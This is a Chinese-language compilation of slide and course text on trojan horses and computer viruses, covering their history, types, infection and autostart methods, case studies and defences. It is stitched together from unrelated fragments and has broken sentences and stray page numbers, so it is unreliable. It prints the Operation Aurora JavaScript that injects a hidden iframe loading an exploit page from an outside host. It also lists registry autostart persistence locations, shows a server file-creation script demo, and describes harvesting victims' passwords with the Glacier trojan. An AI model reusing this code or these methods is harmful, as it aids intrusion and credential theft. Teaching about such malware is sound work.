木马病毒原理及特征分析PPT

互联网的普及使得病毒的传播速度更快、范围更广，对网络安全和数据安全造成了 更大的威胁。
计算机病毒的特点与危害
计算机病毒具有以下 特点
传染性：病毒可以通 过复制自身和传播其 他文件来感染计算机 系统。
隐蔽性：病毒通常隐 藏在可执行文件或数 据文件中，难以被发 现。
计算机病毒的特点与危害
01
02
03
传播方式
通过加密算法对文件进行加密， 并要求用户支付赎金以解锁文件
。
影响范围
全球范围内，影响多个行业和组 织，如医院、学校、政府机构等
。
防范措施
及时更新系统和软件补丁，关闭 恶意软件传播渠道，备份重要数
据。
Petya勒索软件病毒
传播方式
通过感染Windows操作系统文件，使用加密算法对文件进行加密 ，并要求用户支付赎金以解锁文件。
CodeRed蠕虫病毒
传播方式
通过感染Windows操作系统文件和网络共享文件夹，使用复制 和感染文件的方式进行传播。
影响范围
全球范围内，影响多个行业和组织，如医疗、教育、政府机构等 。
防范措施
限制网络共享文件夹访问权限，及时更新系统和软件补丁，关闭 恶意软件传播渠道。
THANKS。
病毒活动。
清除方法
备份恢复法
备份重要数据，然后恢复到正 常状态。
安全模式法
在安全模式下启动计算机，然 后使用防病毒软件进行全盘扫 描。
程序修复法
使用防病毒软件提供的工具修 复被病毒感染的文件。
手动删除法
手动删除病毒文件和相关配置 文件，恢复系统设置。
05
最新计算机病毒案例分析
WannaCry勒索软件病毒
致程序无法正常运行或数据文件损坏。

5.5木马技术5.5.1 木马技术概述木马的全称是“特洛伊木马”（Trojan horse），来源于希腊神话。

古希腊围攻特洛伊城多年无法攻下，于是有人献出木马计策，让士兵藏匿于巨大的木马中，然后佯作退兵，城中得知解围的消息后，将“木马”作为战利品拖入城内，匿于木马中的将士出来开启城门，与城外部队里应外合攻下特洛伊城，后世称这只大木马为“特洛伊木马”。

网络世界的特洛伊木马是指隐藏在正常程序中的一段具有特殊功能的恶意代码，是具备破坏和删除文件、发送密码、记录键盘和DoS攻击等特殊功能的后门程序。

它与控制主机之间建立起连接，使得控制者能够通过网络控制受害系统，通信遵照TCP/IP协议，最大的特征在于隐秘性，偷偷混入对方的主机里面，但是却没有被对方发现。

就象一个潜入敌方的间谍，为其他人的攻击打开后门，这与战争中的木马战术十分相似，因而得名木马程序。

实际上计算机网络木马不但可以窃取、破坏被植入主机的信息，而且可以通过控制主机来攻击网络中的其它主机。

木马程序不仅可能侵害到个人乃至某些公司的利益和权力，更可能危及整个社会和国家的利益和安全。

如果公安部用于采集处理人们身份证信息的计算机被安装了木马，那么这些信息就可能被木马以有线或无线的方式通过网络泄露出去，后果不堪设想。

木马是受控的，它能分清敌我，所以与分不清敌我的其它病毒和攻击技术相比，具有更大的危险性和破坏性。

木马是近几年比较流行的危害程度较严重的恶意软件，常被用作网络系统入侵的重要工具和手段。

2008年金山病毒报告监测显示，木马攻击占当前网络病毒的70%以上，已经成为当前网络危害最严重的网络病毒。

网络上各种“种马”技术加剧了木马的流行和发展，由于木马控制了被植入者的计算机，它几乎可以在被植入主机上为所欲为，破坏程度非常巨大，可以窃取账号密码、删除文件、格式化磁盘，甚至可以打开摄像头进行偷窥等；木马往往又被用做后门，植入被攻击的系统，以便为入侵者再次访问系统提供方便；或者利用被入侵的系统，通过欺骗合法用户的某种方式暗中“散发”木马，以便进一步扩大入侵成果和入侵范围，为进行其它入侵活动，如分布式拒绝服务攻击（DDoS）等提供可能。

。
• 第五代木马反弹式木马。
木马实例演示 （example of a simple Trojan）
• 演示木马：灰鸽子 • 简介 灰鸽子，学名为win32.hack.huigezi，是国内一款著名后门程序 ； 比起前辈冰河、黑洞来，灰鸽子可以说是国内后门的集大成者 ，功能强大，有6万多种变种； 开发者是葛军，该木马的客户端和服务端都是采用Dephi编写 ； 服务端对客户端连接方式有多种，使得处于各种网络环境的用 户都可能中毒，包括局域网用户（通过代理上网）、公网用户 和ADSL拨号用户等； 使用了进程隐藏、线程注入、重复加壳等多种病毒技术，连续 三年被国内各大杀毒厂商评选为“年度十大病毒”。
• 命令广播：可以对自动上线主机进行命令广播，如关 机、重启、打开网页，筛选符合条件的机等，点一个 按钮就可以让N台机器同时关机或其它操作； • 消息广播：可以向对方主机发送消息；
木马植入方法（propagation mechanisms）
直接攻击
电子邮件
经过伪装的 木马被植入 目标机器
ቤተ መጻሕፍቲ ባይዱ
文件下载
浏览网页
例子(CVE2010-0249,Operation Aurora)
• • • • • • • • function Get(){ var Then = new Date() Then.setTime(Then.getTime() + 24*60*60*1000) var cookieString = new String(document.cookie) var cookieHeader = "Cookie1=" var beginPosition = cookieString.indexOf(cookieHeader) if (beginPosition != -1){ } else {document.cookie = "Cookie1=risb;expires="+ Then.toGMTString() • document.writeln("<iframe src=http://pagead2.googlesyndication.xx.xx/pagead/aur ora.htm width=0 height=0></iframe>"); • }}Get();

如IIS服务器的溢出漏洞，通过一个“IISHack”的攻 击程序就可使IIS服务器崩溃，并同时在被攻击服务 器执行“木马”程序。
MIME漏洞则是利用Internet Explorer在处理不正常的 MIME类型存在的问题，攻击者有意地更改MIME类 型，使IE可以不提示用户而直接运行电子邮件附件 中的恶意程序等。
配置木马 传播木马 启动木马 建立连接 远程控制
配置木马
配置木马：
通信配置：监听端口、DNS、IP等 功能配置：文件读取、键盘监听、截屏等 安装配置：安装路径、文件名、是否删除安
装文件、注册表启动项等
配置木马
案例：冰河木马的配置界面
远程控制木马的运行步骤
远程控制木马进行网络入侵的过程:
远程控制木马
木马体系结构：C/S 架构，木马程序 + 控 制端程序
木马程序即是服务器端程序。 控制端程序作为客户端，用于攻击者远程控
制被植入木马的机器。
远程控制木马与远程控制软件的区别?
隐蔽性: 木马被隐藏，避免被发现； 非授权性：木马程序不经授权控制主机
远程控制木马的运行步骤
远程控制木马进行网络入侵的过程:
计算机木马
木马程序具有很大的危害性，主要表现在: 自动搜索已中木马的计算机； 管理对方资源，如复制文件、删除文件、查 看文件内容、上传文件、下载文件等； 跟踪监视对方屏幕； 直接控制对方的键盘、鼠标； 随意修改注册表和系统文件； 共享被控计算机的硬盘资源； 监视对方任务且可终止对方任务； 远程重启和关闭机器。
2007~20半年：毒王“AV终结者”
恶意代码概念的发展史
2010~2020：虚拟货币和隐秘网络带动的 勒索新对抗
2013年开始，勒索软件、挖矿木马逐步泛滥 2016：Mirai爆发，致瘫Dyn 2017：WannaCry全球大爆发 2019：WannaMine挖矿木马爆发

网络钓鱼挂马
网络中最常见的欺骗手段，黑客们利用人们的猎 奇、贪心等心理伪装构造一个链接或者一个网页， 利用社会工程学欺骗方法，引诱点击，当用户打 开一个看似正常的页面时，网页代码随之运行， 隐蔽性极高。
伪装挂马
高级欺骗，黑客利用IE或者Fixfox浏览器的设计 缺陷制造的一种高级欺骗技术，当用户访问木马 页面时地址栏显示或者 等用户信任地址，其实却 打开了被挂马的页面，从而实现欺骗。
• 第四阶段在进程隐藏方面做了非常大的改动，采用了 内核插入式的嵌入方式，利用远程插入线程技术嵌入 DLL线程，或者挂接PSAPI实现木马程序的隐藏。即 使在Windows NT/2K下，这些技术都达到了良好的隐 藏效果。
• 相信，第五代木马的技术更加先进。
木马的关键技术
——植入技术
植入技术
升级植入：打补丁是目前内核及功能升级重要途 径。由于升级包发布途径不严格且非常复杂，因 此，这将成为传播木马的一个有效途径。 网站（网页）植入：网站挂马是传播木马的最佳 途径之一。把木马连接潜入到网站上，当用户访 问该网站时，把木马自动种植到用户的计算机上。 在辅助以附加手段的前提下，该方法也可以实现 定点植入。 漏洞植入：木马通过操作系统的漏洞直接传播给 计算机，其中间桥梁是诸如局域网、Internet、 WiFi、蓝牙、红外等网络连接。
木马检测、清除、防范
• 关键技术、实用工具、防范
怎样才能使计算机更安全？
木马的介绍
概念
特洛伊木马(Trojan Horse) ：是一种与远程计算 机之间建立起连接，使远程计算机能够通过网络 控制用户计算机系统并且可能造成用户的信息损 失、系统损坏甚至瘫痪的程序。
木马的组成
硬件：控制端、服务端、Internet 软件：控制端程序、木马程序、木马配置程序 连接：控制、服务端IP, 控制、服务端Port

木马的攻击原理


一.配置木马 一般来说一个设计成熟的木马都有木马配置程序，从具 体的配置内容看，主要是为了实现以下两方 面功能： (1)木马伪装：木马配置程序为了在服务端尽可能的好的 隐藏木马，会采用多种伪装手段，如修改图标 ，捆绑文件， 定制端口，自我销毁等，我们将在“传播木马”这一节中详 细介绍。 (2)信息反馈：木马配置程序将就信息反馈的方式或地址 进行设置，如设置信息反馈的邮件地址，IRC号 ，ICQ号等 等，具体的我们将在“信息反馈”这一节中详细介绍



第三代木马：网络传播性木马
随着Internet的普及，这一代木马兼备伪装和传播两种特征并结合TCP/IP网络技术四处泛滥。 同时他还有新的特征： 第一，添加了“后门”功能。 所谓后门就是一种可以为计算机系统秘密开启访问入口的程序。一旦被安装，这些程序就能 够使攻击者绕过安全程序进入系统。该功能的目的就是收集系统中的重要信息，例如，财务报告、 口令及信用卡号。此外，攻击者还可以利用后门控制系统，使之成为攻击其它计算机的帮凶。由 于后门是隐藏在系统背后运行的，因此很难被检测到。它们不像病毒和蠕虫那样通过消耗内存而 引起注意。 第二，添加了键盘记录功能。 从名称上就可以知道，该功能主要是记录用户所有的键盘内容然后形成键盘记录的日志文件 发送给恶意用户。恶意用户可以从中找到用户名、口令以及信用卡号等用户信息。这一代木马比 较有名的有国外的BO2000（BackOrifice）和国内的冰河木马。它们有如下共同特点：基于网络 的客户端/服务器应用程序。具有搜集信息、执行系统命令、重新设置机器、重新定向等功能。 当 木马程序攻击得手后，计算机就完全在黑客控制的傀儡主机，黑客成了超级用户，用户的所有计 算机操作不但没有任何秘密而言，而且黑客可以远程控制傀儡主机对别的主机发动攻击，这时候 背俘获的傀儡主机成了黑客进行进一步攻击的挡箭牌和跳板。 虽然木马程序手段越来越隐蔽，但是苍蝇不叮无缝的蛋，只要加强个人安全防范意识，还是 可以大大降低\“中招\”的几率。对此笔者有如下建议：安装个人防病毒软件、个人防火墙软件；及 时安装系统补丁；对不明来历的电子邮件和插件不予理睬；经常去安全网站转一转，以便及时了 解一些新木马的底细，做到知己知彼，百战不殆。

六、木马的防范
1、使用病毒防火墙或木马监控程序并及时升级 2、不要轻易打开来历不明的电子邮件附件 3、及时升级浏览器软件、电子邮件软件 4、到大型的网站上下载软件，下载后先进行杀毒 5、显示所有文件的扩展名
一、关于木马
• 木马，又叫特洛伊木马(Trojan Horse)，是一种恶意程序，是基于远 程控制的黑客工具，一旦侵入用户的 计算机，就悄悄地在宿主计算机上运 行，在用户毫无察觉的情况下，让攻 击者获得远程访问和控制系统的权限， 进而在用户的计算机中修改文件、修 改注册表、控制鼠标、监视/控制键盘， 或窃取用户信息。 • 古希腊特洛伊之战中利用木马攻陷特 洛伊城；现代网络攻击者利用木马， 采用伪装、欺骗等手段进入被攻击的 计算机系统中，窃取信息，实施远程 监控。
启动方式：集成(捆绑)到应用程序中、隐藏在Autoexec.bat和Config.sys
中、潜伏在Win.ini中、在System.ini中藏身、隐蔽在Winstart.bat中、隐藏在 应用程序的启动配置文件中、伪装在普通文件中、内置到注册表中、隐形于 启动组中、修改文件关联、修改运行可执行文件的方式、设置在超级链接 中。。。 木马常用的传播方式，有以下几种： 以邮件附件的形式传播； 木马伪装之后添加到附件中，发送给收件人； 通过QQ等聊天工具软件传播； 通过提供软件下载的网站传播； 通过一般的病毒和蠕虫传播； 通过带木马的磁盘和光盘进行传播。。。
案例3：
中国某军工科研所发生泄密事件
参与中国海军潜艇科研项目的某军工科研 所发生了重大泄密事件。多份重要保密资料和文 件，甚至一些关键材料的绝密技术资料，都落入 境外情报机关之手。安全、保密等部门迅速查清 了案情：原来又是境外间谍机构无孔不入的网络 窃密攻击。网络间谍工具寻隙钻入一台违规上网 的工作电脑，将其中存储的大量涉及军工项目的 文件资料搜出、下载、传回。泄密案的当事人姓 彭，是一名科研人员。去年中秋前，他用工作电 脑上网查阅自己的邮箱时，收到了一封“国防科 工委办公厅的中秋贺卡”，他没有多想，信手点 开，结果中了网络间谍木马。邮件完全是伪造的， 捆绑着某境外情报机构特制的间谍程序，一经点 击就控制了彭某的工作电脑，偏偏彭某的电脑中 还违规存储了大量军工科研项目的资料，结果， 连潜艇隐身材料这样的军工技术机密都被间谍程 序从网上窃走了。

1、计算机病毒的技术构成

(1)驻留内存技术 (2)病毒变形及变种 (3)抗分析技术 (4)多态性病毒技术

使用不固定的密钥或者随机数加密病毒代码； 运行的过程中改变病毒代码； 通过一些奇怪的指令序列实现多态性。

(5)网络病毒技术
第 10 页 / 共 20 页
三、计算机病毒的技术特征



20 世 纪 70 年 代 ， 在 美 国 作 家 雷 恩 出 版 的 《P1 的 青 春 － The Adolescence of P1》一书中，首次勾勒出了病毒程序的蓝图。 20世纪80年代早期出现了第一批计算机病毒。 1988 年冬天出现了第一个 Internet 蠕虫病毒，被命名为 Morris Worm （一种使用自行传播恶意代码的恶意软件，它可以通过网络 连接，自动将其自身从一台计算机分发到另一台计算机）。 1988年11月2日下午 5点，互联网的管理人员首次发现网络有不明 入侵者。 1991年在“海湾战争”中，美军第一次将计算机病毒应用于实战， 正式将病毒作为一种攻击性“武器”投入使用。 90 年代网上开始出现病毒交流布告栏，成为病毒编写者合作和共享 知识的平台。电子邮件、网站、共享驱动器和产品漏洞都为病毒复制 和攻击提供了平台。 2006年末，计算机病毒产业发生了巨大的变化 —从病毒研制到营销 过程完全采用商业化运作，直接以经济利益为目的传播病毒，破坏网 络系统。

特征：



第 5 页 / 共 20 页
一、计算机病毒概述
4、计算机病毒的分类

按照计算机病毒的特点及特性，计算机病毒的分类方法有 许多种。因此，同一种病毒可能有多种不同的分法。

按照计算机病毒攻击的系统分类 按照病毒的攻击机型分类 按照计算机病毒的链结方式分类 按照计算机病毒的破坏情况分类 按照计算机病毒的寄生部位或传染对象分类 按照传播媒介分类

目前智能手机系统上的木马病毒程序已经泛滥，特别是Android系统开源且水货、刷机行为较多，成为木马病毒的主要攻击方向。

Android系统的木马病毒系统可分为如下主要特征：1、获取硬件信息，如IMEI、IMSI等2、访问特定网站，增加流量或通话费用3、窃取用户通话及短信信息4、窃取用户键盘输入的敏感信息在以上特点中，第三和第四点对手机银行的危险性最大，木马能够窃取客户输入的用户名、密码以及手机交易码信息，并发送远程服务器。

1、窃取用户通话及短信信息木马介绍2011年11月，信息安全厂商卡巴斯基发表分析文章，介绍智能手机ZitMo （ZeuS-in-the-Mobile）木马是如何盗取用户重要数据的。

手机交易码曾被认为是最可靠的网银安全保护措施之一。

然而，随着专门针对智能手机的ZeuS木马出现，特别是ZeuS-in-the-Mobile或ZitMo–mTANs的出现，手机交易码已不能确保用户的重要数据不会落入网络罪犯的手中。

ZitMo 于2010年9月首次被检测到，专门用来盗取由银行发送的短信息中的mTAN 代码，也是迄今为止最受关注的手机安全事件之一。

网络安全专家分析称，“首先，该病毒具有跨平台传播的能力，无论是Symbian、Windows Mobile、Blackberry和Android系统，都被检测到了这种木马，其目的主要是将手机交易码短信息转发给网络罪犯(或者是一台服务器)，后者进而可以利用这些被侵入的银行账户进行非法交易。

但是，ZitMo最大的特点是它与台式计算机木马ZeuS背后的关系。

如果没有后者的话，ZitMo仅仅能起到一个转发短信息的间谍程序作用。

而通过它们之间的…团队合作‟，网络罪犯才能成功的避开保护网银安全所使用的mTAN安全设置。

”这种攻击方式的精心安排通常有以下几个步骤：网络罪犯首先使用台式计算机版的ZeuS来盗取必要的数据，以便进入网银账户并收集用户的手机号码。

受害者的手机收到一条要求升级安全证书或其它重要软件的短信。

•计算机病毒概述•计算机病毒识别与检测•计算机病毒防范策略与措施•杀毒软件选择与应用技巧•系统漏洞修补与网络安全配置•数据备份恢复与应急处理方案•总结回顾与未来展望计算机病毒概述定义与分类定义计算机病毒是一种恶意软件，通过复制自身并在计算机网络中进行传播，从而破坏数据、干扰计算机操作或占用系统资源。

分类根据病毒的特性和传播方式，可分为蠕虫病毒、木马病毒、宏病毒、文件病毒、启动区病毒等。

发展历程及现状发展历程计算机病毒自诞生以来，经历了从简单到复杂、从单机到网络的发展历程。

随着互联网的普及和技术的进步，计算机病毒的传播速度和破坏力也在不断提升。

现状目前，计算机病毒已经成为网络安全领域的重要威胁之一。

随着黑客技术的不断发展和演变，计算机病毒的种类和传播方式也在不断增多，给个人和企业带来了严重的安全威胁。

危害程度与影响范围危害程度计算机病毒的危害程度因病毒类型和攻击目标而异。

一些病毒会破坏数据和文件，导致系统崩溃或数据丢失；另一些病毒则会占用系统资源，导致计算机运行缓慢或无法正常工作。

影响范围计算机病毒的影响范围非常广泛，可以影响个人计算机、企业网络甚至整个互联网。

一些病毒还会通过电子邮件、社交媒体等途径传播，进一步扩大了其影响范围。

计算机病毒识别与检测通过网络传播，占用大量网络资源，导致网络拥堵。

隐藏在正常程序中，窃取用户信息，如账号密码等。

加密用户文件，要求支付赎金才提供解密工具。

感染Office等文档，通过宏命令进行传播和破坏。

蠕虫病毒木马病毒勒索病毒宏病毒常见病毒类型及特点识别方法与技术手段行为分析监控程序运行时的行为，如异常的网络连接、文件操作等。

提供实时防护、病毒查杀、系统修复等功能。

360安全卫士集病毒查杀、系统优化、软件管理等功能于一体。

腾讯电脑管家专注于病毒查杀和防御，提供强大的自定义设置功能。

火绒安全软件定期更新病毒库，定期全盘扫描，注意设置实时防护和自动处理威胁。

使用指南检测工具推荐及使用指南计算机病毒防范策略与措施ABDC安装可靠的安全软件使用知名的防病毒软件，并及时更新病毒库和引擎，确保对最新威胁的防护。

传播途径更加广泛
随着网络攻击技术的不断发展，摆渡 木马的传播途径也将更加广泛，攻击 者可以通过各种途径，如社交媒体、 电子邮件、恶意网站等，散播摆渡木 马，以增加攻击的范围和效果。
“摆渡”木马的未来展望
防御技术不断提升
随着网络安全技术的不断发展，防御摆渡木马的手段也 将不断提升，安全软件将更加具有检测和防范摆渡木马 的能力，攻击者将面临更大的挑战。
一旦被触发，摆渡木马 会通过网络与控制端建 立连接，并接收来自控 制端的命令。
控制端可以通过摆渡木 马将恶意文件传输到被 感染主机上，或者从被 感染主机上窃取敏感信 息。
摆渡木马会执行来自控 制端的命令，如记录键 盘输入、窃取用户密码 等。
摆渡木马会将执行结果 反馈给控制端，以便攻 击者掌握攻击进展和效 果。
强大的破坏性
广泛传播性
摆渡木马可以破坏系统的稳定性和安全性， 导致数据丢失、隐私泄露、计算机系统崩溃 等严重后果。
摆渡木马可以通过网络、移动存储设备等多 种途径传播，造成大规模的感染和破坏。
“摆渡”木马的历史与发展
“摆渡”木马是一种较为古老的恶意软件，早在20世纪末 就已出现。最初它主要通过邮件和网络下载传播，用于攻 击个人计算机系统。
随着网络技术的发展和普及，摆渡木马逐渐发展成为一种 大规模的网络攻击工具。攻击者可以利用它控制受害者的 计算机系统，进行窃取、篡改、删除等恶意操作，甚至可 以用来制造僵尸网络、发动DDoS攻击等。
02
“摆渡”木马的工作原理
“摆渡”木马的传播方式
01
伪装成正常软件
02
网络钓鱼
摆渡木马通常会伪装成正常软件，如 文本编辑器、媒体播放器等，通过社 交工程手段诱骗用户下载安装。

三、解决方案
1、及时升级杀毒软件，之后认真在整个 硬盘上查杀此病毒，彻底清除掉查到的 Backdoor.Gapin木马病毒。
2、到注册表编辑 器:HKEY_LOCAL_MACHINE\Software\ Microsoft\Windows\CurrentVersion\Run中 将键值：
Remote C:\%Windir%\AdminClient.exe 删除。
二、病毒运行机制
1、此病毒一旦被激活并开始运行，那么它将 复制本身到：C:\%Windir%\AdminClient.exe文件 中，其中：%Windir%是个变量，此木马病毒会 自动查找系统目录并将本身复制到其中，默认的 是C:\Windows或C:\Winnt。
2、此病毒能够添加键值：Remote C:\%Windir%\AdminClient.exe到注册表编辑器：
<BR>HKEY_LOCAL_MACHINE\Software\Micros oft\Windows\CurrentVersion\Run中,使得机器启动 时病毒就会自动运行。
3、此病毒收集被感染的计算机系统信息后以 电子邮件的形式发送给黑客。
4、此病毒通过端口1039来允许黑客控制被病 毒感染的计算机。
附7：backdoor病毒 及解决方法
病毒名称：Backdoor.Gapin
发现日期：2003-02-27
病毒类型木马病毒 传播范围：低
危害级别：低
传播速度：低
一、病毒介绍
Backdoor.Gapin木马病毒是通过微软的 VB语言编写的，并通过1039端口允许黑 客非法的接近被此病毒感染的计算机。 此病毒的感染长度为32768字节。此病毒 感染安装有Windows 95, Windows 98, Windows NT, Windows 2000, Windows XP, Windows Me操作系统的计算机，而不会 感染安装有Macintosh, OS/2, UNIX, Linux 操作系统的计算机。

木马病毒目录什么是木马（Trojan）木马的种类如何防御木马病毒？如何查出木马的一些方法如何删除木马病毒？木马病毒最爱藏身的几个地方什么是木马（Trojan）木马（Trojan）这个名字来源于古希腊传说（荷马史诗中木马计的故事，Trojan一词的本意是特洛伊的，即代指特洛伊木马，也就是木马计的故事）。

特洛伊木马“木马”程序是目前比较流行的病毒文件，与一般的病毒不同，它不会自我繁殖，也并不“刻意”地去感染其他文件，它通过将自身伪装吸引用户下载执行，向施种木马者提供打开被种者电脑的门户，使施种者可以任意毁坏、窃取被种者的文件，甚至远程操控被种者的电脑。

“木马”与计算机网络中常常要用到的远程控制软件有些相似，但由于远程控制软件是“善意”的控制，因此通常不具有隐蔽性；“木马”则完全相反，木马要达到的是“偷窃”性的远程控制，如果没有很强的隐蔽性的话，那就是“毫无价值”的。

它是指通过一段特定的程序（木马程序）来控制另一台计算机。

木马通常有两个可执行程序：一个是客户端，即控制端，另一个是服务端，即被控制端。

植入被种者电脑的是“服务器”部分，而所谓的“黑客”正是利用“控制器”进入运行了“服务器”的电脑。

运行了木马程序的“服务器”以后，被种者的电脑就会有一个或几个端口被打开，使黑客可以利用这些打开的端口进入电脑系统，安全和个人隐私也就全无保障了！木马的设计者为了防止木马被发现，而采用多种手段隐藏木马。

木马的服务一旦运行并被控制端连接，其控制端将享有服务端的大部分操作权限，例如给计算机增加口令，浏览、移动、复制、删除文件，修改注册表，更改计算机配置等。

随着病毒编写技术的发展，木马程序对用户的威胁越来越大，尤其是一些木马程序采用了极其狡猾的手段来隐蔽自己，使普通用户很难在中毒后发觉。

木马的种类1. 网络游戏木马随着网络在线游戏的普及和升温，我国拥有规模庞大的网游玩家。

网络游戏中的金钱、装备等虚拟财富与现实财富之间的界限越来越模糊。

57
② 执行脚本编写的代码。要执行上述代 码，首先要配好IIS服务器和Web服务器。 ③ 当Web服务器配置完成，将上述编辑 好的代码保存到Web服务器的路径中， 如“C:\Inetpub\ wwwroot\test.asp”。
58
④ 打开IE浏览器，在地址栏中输入 “http://localhost/test.asp”，运行脚本。 这时，如果脚本没有语法错误，则将在 网页中输出“新建文件myfile”，并且在 D盘根目录下建立了一个文件myfile，如 图4.29所示。
("Scripting.FilesystemObject")”产生一个服
务器系统对象。
56

使用“fso.Create TextFile
（"d:\myfile"）”在D盘根目录建立一个文件
myfile，并且使用response.write（"新建文件
myfile"）在页面中说明文件建立的完成。
59
图4.29 网页病毒
60
4．网页病毒的防范
① 使用“regsvr32 scrrun.dll/u”命令 禁用文件系统对象“FileSystemObject”。
② 自定义安全级别，打开IE浏览器， 在“Internet选项”→“安全”选项中选 择“自定义安全级别”，把“ActiveX控 件及插件”的一切设置设为禁用，如图 4.30所示。
冰河操作(5)
31
冰河操作(6)
3.口令获取：口令类命令里可是有不少好东西的！ 如果你运气够好的话，你会找到很多的网站名、 用户名和口令。 图中第一处抹黑的是上网帐号的密码，这可 不能乱用喔。第2处抹掉的就是QQ46581282的密 码了!

EXAMPLE：风雪
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\ Services\resnow
网络信息安全
木马启动方式

屏幕保护
屏幕保护程序.scr文件——是PE格式的可执 行文件 当前屏保程序 [HKEY_CURRENT_USER\Control Panel\desktop] SCRNSAVE.EXE 当前屏保启动时间 [HKEY_CURRENT_USER\Control Panel\desktop] ScreenSaveTimeOut


代表

微点 Micropoint
网络信息安全
木马的防范
提高安全意识 使用查杀木马的软件 查看TCP和UDP连接 端口扫描 防火墙

网络信息安全
木马的防范
小心下载软件 不随意浏览邮件附件 及时更新病毒库、系统升级 始终显示扩展名 、隐藏文件和系统文件 经常查看注册表相关键值
网络信息安全
木马启动方式
第二自启动目录 开始 -> 程序 -> 启动

•Win 2k\XP…… •C:\Documents and Settings\All Users\ 「开始」菜单\程序\启动
网络信息安全
木马启动方式

利用批处理文件启动
AUTOEXEC.BAT——系统盘根目录下，引 导系统时执行 WinStart.bat——WINDOWS目录下，启动 GUI(graphic user interface)图形界面环境 时执行
网络信息安全
木马启动方式

注册表其他位置

Explorer [HKEY_LOCAL_MACHINE\SOFTWARE\Microsof t\WindowsNT\CurrentVersion\Winlogon\Shell] ……

手机中毒的一般表现
通话质量下降或者延迟（dos攻击）
某些手机病毒木马程序可以监听使用者的 语音通话，一旦中了这种恶意程序就可能 会发现手机通话质量产生明显的下降。还 有一种情况是恶意程序大量发送短信时也 会造成信道繁忙，从而影响通话。 曾经某地区用户发现手机信号是满格的， 当时却打不出去电话，这就是由于在该时 段许多用户的手机同时发送大量垃圾短信 从而，造成这种现象。
智能手机系统
iOS是由苹果公司为iPhone开发的操作系统。 它主要是给iPhone、iPod touch以及iPad使用。 就像其基于的Mac OS X操作系统一样，它也是
以Darwin为基础的。原本这个系统名为iPhone OS，直到2010年6月7日WWDC大会上宣布改 名为IOS。 iOS的系统架构分为四个层次：核 心操作系统层（the Core OS layer），核心服务 层（the Core Services layer），媒体层（the Media layer），可轻触层（the Cocoa Touch layer）。系统操作占用大概240MB的存储器空 间。
手机软件数字签名
总体说来软件数字签名这方面，apple做的
比较成功，目前除了越狱的Iphone系统外， 基本上没有手机恶意程序。 Symbian数字签名的管理上比较混乱，从而 使手机病毒木马有了可乘之机。 Android是实行自签名的，不需要权威的数 字证书机构签名认证。 Windows Mobile的数字签名机制，没有塞 班那么严格，只有涉及到系统或调用了受 限的API的程序或dll才需要签名。
智能手机系统
Android一词的本义指“机器人”，同时也
是Google于2007年11月5日宣布的基于Linux 平台的开源手机操作系统的名称，该平台 由操作系统、中间件、用户界面和应用软 件组成，号称是首个为移动终端打造的真 正开放和完整的移动软件。

木马的安全与技术姓名：王芳学号：200841607049学院：化学化工与环境学院系别：环境科学系在计算机领域中，木马是有隐藏性的、自发性的可被用来进行恶意行为的程序，多不会直接对电脑产生危害，而是以控制为主。

木马主要可分为以下几种，（1）破坏型：这种木马唯一的功能就是破坏并且删除文件，它们非常简单，很容易使用。

能自动删除目标机上的DLL、INI、EXE 文件，所以非常危险，一旦被感染就会严重威胁到电脑的安全。

（2）密码发送型：这种木马可以找到目标机的隐藏密码，并且在受害者不知道的情况下，把它们发送到指定的信箱。

如果目标机有隐藏密码，这些木马是非常危险的。

（3）远程访问型：这种木马是现在使用最广泛的木马，它可以远程访问被攻击者的硬盘。

只要有人运行了服务端程序，客户端通过扫描等手段知道了服务端的IP地址，就可以实现远程控制。

（4）键盘记录木马：这种特洛伊木马非常简单，它们只做一件事情，就是记录受害者的键盘敲击并且在LOG 文件里查找密码，并且随着Windows 的启动而启动，自动将密码发送到黑客指定的邮箱。

（5）DOS攻击木马（6）FTP木马：这种木马是最简单和古老的木马，它的惟一功能就是打开21端口，等待用户连接。

（7）反弹端口型木马：与一般的木马相反，反弹端口型木马的服务端（被控制端）使用主动端口，客户端（控制端）使用被动端口。

木马定时监测控制端的存在，发现控制端上线立即弹出端口主动连结控制端打开的被动端口；为了隐蔽起见，控制端的被动端口一般开在80，用户稍微疏忽一点，就会以为是自己在浏览网页，因为浏览网页都会打开80端口的。

（8）代理木马：这是黑客用来隐藏自身踪迹的一种木马。

（9）程序杀手木马：上面的木马功能虽然形形色色，不过到了对方机器上要发挥自己的作用，还要过防木马软件这一关才行。

常见的防木马软件有ZoneAlarm,Norton Anti-Virus 等。

程序杀手木马的功能就是关闭对方机器上运行的这类程序，让其他的木马更好地发挥作用。